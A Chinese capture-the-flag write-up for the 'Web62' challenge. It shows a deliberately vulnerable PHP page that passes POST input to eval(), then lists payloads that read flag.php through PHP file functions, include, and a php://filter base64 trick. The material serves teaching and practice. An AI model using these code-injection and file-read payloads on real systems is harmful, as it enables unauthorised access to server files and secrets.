Web62

[!IMPORTANT]

0x01

访问靶场，回显源码

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

<?php

/*
# -*- coding: utf-8 -*-
# @Author: Lazzaro
# @Date:   2020-09-05 20:49:30
# @Last Modified by:   h1xa
# @Last Modified time: 2020-09-07 22:02:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com

*/

// 你们在炫技吗？
if(isset($_POST['c'])){
        $c= $_POST['c'];
        eval($c);
}else{
    highlight_file(__FILE__);
}

0x02

雷同58，此处补充一些常见读取文件命令及payload替代

• file():

  1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25

  //payload示例 c=echo file_get_contents('flag.php'); c=echo highlight_file('flag.php'); c=highlight_file("flag.php"); c=show_source('flag.php'); c= $a=fopen("flag.php","r"); while($b=fgets($a)){ echo $b; } //file()函数：把整个文件读入一个数组中 c=print_r(file('flag.php')); c=var_dump(file('flag.php')); c=readfile("flag.php"); //一行一行读取 c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgets($a);echo $line;} //一个一个字符读取 c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetc($a);echo $line;} c=$a=fopen("flag.php","r");while (!feof($a)) {$line = fgetcsv($a);var_dump($line);}

  1. file_get_contents()

  2. highlight_file()

  3. show_source()

  4. fgets()

  5. readfile()

  6. fopen()

  7. include " ":

     1 2 3 4 5 6 7

     c=include('flag.php');echo $flag; c=include($_GET['1']); ?1=php://filter/convert.base64-encode/resource=flag.php c=include('flag.php');var_dump(get_defined_vars()); //var_dump:输出注册变量 //get_defined_vars():函数返回由所有已定义变量所组成的数组